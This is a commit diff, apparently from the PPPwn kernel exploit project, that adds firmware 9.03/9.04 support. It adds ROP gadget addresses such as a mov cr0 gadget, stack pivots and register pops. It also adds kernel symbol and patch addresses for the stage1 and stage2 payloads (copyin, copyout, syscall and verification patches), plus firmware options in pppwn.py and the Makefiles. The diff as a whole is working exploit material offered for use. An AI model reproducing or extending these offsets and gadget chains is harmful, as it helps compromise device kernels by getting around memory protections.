✨ 9.03/9.04 Support (#15)

* ✨ 9.03 Support

* 🚑️ Found the imposter ඞ

* 🚑️ Properly killed the imposter ඞ 🫠

* 🚑️ Fixed SUS byte (wrong offset for KMEM_ALLOC_PATCH1)

* 🚑 Fixed offset of `POP_R8_POP_RBP_RET` 🫠

* 🎨 Final touches

* ✏️ Renamed `OffsetsFirmware_903` to `OffsetsFirmware_903_904`

* 💡Added offsets to gadgets (Thank you Copilot <3)

offsets.py

@@ -18,6 +18,7 @@ class OffsetsFirmware_900:
 
     MEMCPY = 0xffffffff824714b0
 
+    # 0xffffffff823fb949 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
     MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949
 
     SECOND_GADGET_OFF = 0x3d
@@ -98,6 +99,100 @@ class OffsetsFirmware_900:
     JMP_R14 = 0xffffffff82b85693
 
 
+# FW 9.03/9.04
+class OffsetsFirmware_903_904:
+    PPPOE_SOFTC_LIST = 0xffffffff843e99f8
+
+    KERNEL_MAP = 0xffffffff84464d48
+    SETIDT = 0xffffffff825128e0
+
+    KMEM_ALLOC = 0xffffffff8257a070
+    KMEM_ALLOC_PATCH1 = 0xffffffff8257a13c
+    KMEM_ALLOC_PATCH2 = 0xffffffff8257a144
+
+    MEMCPY = 0xffffffff82471130
+
+    # 0xffffffff823fb679 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
+    MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb679
+
+    SECOND_GADGET_OFF = 0x3d
+
+    # 0xffffffff829e686f : jmp qword ptr [rsi + 0x3d]
+    FIRST_GADGET = 0xffffffff829e686f
+
+    # 0xffffffff82c74566 : push rbp ; jmp qword ptr [rsi]
+    PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c74566
+
+    # 0xffffffff822b4151 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
+    POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822b4151
+
+    # 0xffffffff8293fe06 : lea rsp, [rsi + 0x20] ; repz ret
+    LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293fe06
+
+    # 0xffffffff826c31aa : add rsp, 0x28 ; pop rbp ; ret
+    ADD_RSP_28_POP_RBP_RET = 0xffffffff826c31aa
+
+    # 0xffffffff8251ad2f : add rsp, 0xb0 ; pop rbp ; ret
+    ADD_RSP_B0_POP_RBP_RET = 0xffffffff8251ad2f
+
+    # 0xffffffff822008e0 : ret
+    RET = 0xffffffff822008e0
+
+    # 0xffffffff8238e75d : pop rdi ; ret
+    POP_RDI_RET = 0xffffffff8238e75d
+
+    # 0xffffffff822aad39 : pop rsi ; ret
+    POP_RSI_RET = 0xffffffff822aad39
+
+    # 0xffffffff8244cc56 : pop rdx ; ret
+    POP_RDX_RET = 0xffffffff8244cc56
+
+    # 0xffffffff822445e7 : pop rcx ; ret
+    POP_RCX_RET = 0xffffffff822445e7
+
+    # 0xffffffff822ab4dd : pop r8 ; pop rbp ; ret
+    POP_R8_POP_RBP_RET = 0xffffffff822ab4dd
+
+    # 0xffffffff8279d9cf : pop r12 ; ret
+    POP_R12_RET = 0xffffffff8279d9cf
+
+    # 0xffffffff82234ec8 : pop rax ; ret
+    POP_RAX_RET = 0xffffffff82234ec8
+
+    # 0xffffffff822008df : pop rbp ; ret
+    POP_RBP_RET = 0xffffffff822008df
+
+    # 0xffffffff82bb479a : push rsp ; pop rsi ; ret
+    PUSH_RSP_POP_RSI_RET = 0xffffffff82bb479a
+
+    # 0xffffffff82244ed0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
+    MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82244ed0
+
+    # 0xffffffff825386d8 : mov byte ptr [rcx], al ; ret
+    MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff825386d8
+
+    # 0xffffffff82630b0c : mov rdi, rbx ; call r12
+    MOV_RDI_RBX_CALL_R12 = 0xffffffff82630b0c
+
+    # 0xffffffff8235b337 : mov rdi, r14 ; call r12
+    MOV_RDI_R14_CALL_R12 = 0xffffffff8235b337
+
+    # 0xffffffff822e3d2e : mov rsi, rbx ; call rax
+    MOV_RSI_RBX_CALL_RAX = 0xffffffff822e3d2e
+
+    # 0xffffffff823638c8 : mov r14, rax ; call r8
+    MOV_R14_RAX_CALL_R8 = 0xffffffff823638c8
+
+    # 0xffffffff82cb475a : add rdi, rcx ; ret
+    ADD_RDI_RCX_RET = 0xffffffff82cb475a
+
+    # 0xffffffff82409287 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
+    SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82409287
+
+    # 0xffffffff82b835b3 : jmp r14
+    JMP_R14 = 0xffffffff82b835b3
+
+
 # FW 11.00
 class OffsetsFirmware_1100:
     PPPOE_SOFTC_LIST = 0xffffffff844e2578
@@ -112,6 +207,7 @@ class OffsetsFirmware_1100:
 
     MEMCPY = 0xffffffff824dddf0
 
+    # 0xffffffff824f1299 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
     MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299
 
     SECOND_GADGET_OFF = 0x3e

pppwn.py

@@ -820,7 +820,7 @@ def run(self):
 def main():
     parser = ArgumentParser('pppwn.py')
     parser.add_argument('--interface', required=True)
-    parser.add_argument('--fw', choices=['900', '1100'], default='1100')
+    parser.add_argument('--fw', choices=['900', '903', '904', '1100'], default='1100')
     parser.add_argument('--stage1', default='stage1/stage1.bin')
     parser.add_argument('--stage2', default='stage2/stage2.bin')
     args = parser.parse_args()
@@ -836,6 +836,8 @@ def main():
 
     if args.fw == '900':
         offs = OffsetsFirmware_900()
+    elif args.fw in ('903', '904'):
+        offs = OffsetsFirmware_903_904()
     elif args.fw == '1100':
         offs = OffsetsFirmware_1100()
 

stage1/Makefile

@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 1100),)
+ifneq ($(filter $(FW), 900 903 904 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

stage1/offsets.h

@@ -36,6 +36,34 @@
 #define kdlsym_addr_uart_patch 0xffffffff8372bf60
 #define kdlsym_addr_veri_patch 0xffffffff82826874
 
+#elif (FIRMWARE == 903 || FIRMWARE == 904) // FW 9.03/9.04
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 // Identical to 9.00
+
+#define kdlsym_addr_pppoe_softc_list 0xffffffff843e99f8
+
+#define kdlsym_addr_cc_cpu 0xffffffff843a9360
+#define kdlsym_addr_callwheelsize 0xffffffff843ab360
+
+#define kdlsym_addr_nd6_llinfo_timer 0xffffffff822ad070 // Identical to 9.00
+
+#define kdlsym_addr_Xill 0xffffffff8237d4b0
+#define kdlsym_addr_setidt 0xffffffff825128e0
+
+#define kdlsym_addr_kernel_map 0xffffffff84464d48
+#define kdlsym_addr_kmem_alloc 0xffffffff8257a070
+
+#define kdlsym_addr_kproc_create 0xffffffff822969e0 // Identical to 9.00
+#define kdlsym_addr_kproc_exit 0xffffffff82296c50 // Identical to 9.00
+
+#define kdlsym_addr_ksock_create 0xffffffff82619c90
+#define kdlsym_addr_ksock_close 0xffffffff82619d00
+#define kdlsym_addr_ksock_bind 0xffffffff82619d10
+#define kdlsym_addr_ksock_recv 0xffffffff8261a070
+
+#define kdlsym_addr_uart_patch 0xffffffff83727f60
+#define kdlsym_addr_veri_patch 0xffffffff82824834
+
 #elif FIRMWARE == 1100 // FW 11.00
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0

stage2/Makefile

@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 1100),)
+ifneq ($(filter $(FW), 900 903 904 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

stage2/offsets.h

@@ -31,6 +31,29 @@
 #define kdlsym_addr_copyinstr_patch2 0xffffffff82471baf
 #define kdlsym_addr_copyinstr_patch3 0xffffffff82471be0
 
+#elif (FIRMWARE == 903 || FIRMWARE == 904) // FW 9.03/9.04
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 // Identical to 9.00
+
+#define kdlsym_addr_printf 0xffffffff822b79e0
+
+#define kdlsym_addr_sysent 0xffffffff832fc310
+
+#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490 // Identical to 9.00
+#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5 // Identical to 9.00
+#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9 // Identical to 9.00
+#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2 // Identical to 9.00
+
+#define kdlsym_addr_copyin_patch1 0xffffffff82471377
+#define kdlsym_addr_copyin_patch2 0xffffffff82471383
+
+#define kdlsym_addr_copyout_patch1 0xffffffff82471282
+#define kdlsym_addr_copyout_patch2 0xffffffff8247128e
+
+#define kdlsym_addr_copyinstr_patch1 0xffffffff82471823
+#define kdlsym_addr_copyinstr_patch2 0xffffffff8247182f
+#define kdlsym_addr_copyinstr_patch3 0xffffffff82471860
+
 #elif FIRMWARE == 1100 // FW 11.00
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0